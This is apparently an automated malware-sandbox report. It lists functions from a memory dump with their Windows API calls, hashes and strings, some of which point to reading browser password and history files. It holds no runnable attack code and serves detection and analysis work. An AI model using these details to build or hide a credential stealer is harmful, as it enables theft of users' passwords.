                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 00417497
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                    • malloc.MSVCRT ref: 004174BD
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                    • String ID:
                    • API String ID: 2903831945-0
                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 0040D453
                    • GetWindowRect.USER32(?,?), ref: 0040D460
                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • memset.MSVCRT ref: 004450CD
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                    • String ID:
                    • API String ID: 1471605966-0
                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    • wcscpy.MSVCRT ref: 0044475F
                    • wcscat.MSVCRT ref: 0044476E
                    • wcscat.MSVCRT ref: 0044477F
                    • wcscat.MSVCRT ref: 0044478E
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                    • String ID: \StringFileInfo\
                    • API String ID: 102104167-2245444037
                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                    Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$??3@
                    • String ID: g4@
                    • API String ID: 3314356048-2133833424
                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _memicmpwcslen
                    • String ID: @@@@$History
                    • API String ID: 1872909662-685208920
                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004100FB
                    • memset.MSVCRT ref: 00410112
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 00410141
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf_wcslwrwcscpy
                    • String ID: </%s>
                    • API String ID: 3400436232-259020660
                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040D58D
                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChildEnumTextWindowWindowsmemset
                    • String ID: caption
                    • API String ID: 1523050162-4135340389
                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                    • String ID: MS Sans Serif
                    • API String ID: 210187428-168460110
                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClassName_wcsicmpmemset
                    • String ID: edit
                    • API String ID: 2747424523-2167791130
                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID: SHAutoComplete$shlwapi.dll
                    • API String ID: 3150196962-1506664499
                    • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                    • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp
                    • String ID:
                    • API String ID: 3384217055-0
                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                    • GetMenu.USER32(?), ref: 00410F8D
                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                    • String ID:
                    • API String ID: 1889144086-0
                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                    • GetLastError.KERNEL32 ref: 0041810A
                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastMappingView
                    • String ID:
                    • API String ID: 1661045500-0
                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                    • memcpy.MSVCRT ref: 0042EC7A
                    Strings
                    • virtual tables may not be altered, xrefs: 0042EBD2
                    • sqlite_altertab_%s, xrefs: 0042EC4C
                    • Cannot add a column to a view, xrefs: 0042EBE8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                    • API String ID: 1297977491-2063813899
                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040560C
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.*$dat$wand.dat
                    • API String ID: 2618321458-1828844352
                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • wcslen.MSVCRT ref: 00410C74
                    • _wtoi.MSVCRT ref: 00410C80
                    • _wcsicmp.MSVCRT ref: 00410CCE
                    • _wcsicmp.MSVCRT ref: 00410CDF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                    • String ID:
                    • API String ID: 1549203181-0
                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00412057
                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                    • GetKeyState.USER32(00000010), ref: 0041210D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                    • String ID:
                    • API String ID: 3550944819-0
                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                    Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • memcpy.MSVCRT ref: 0040A94F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
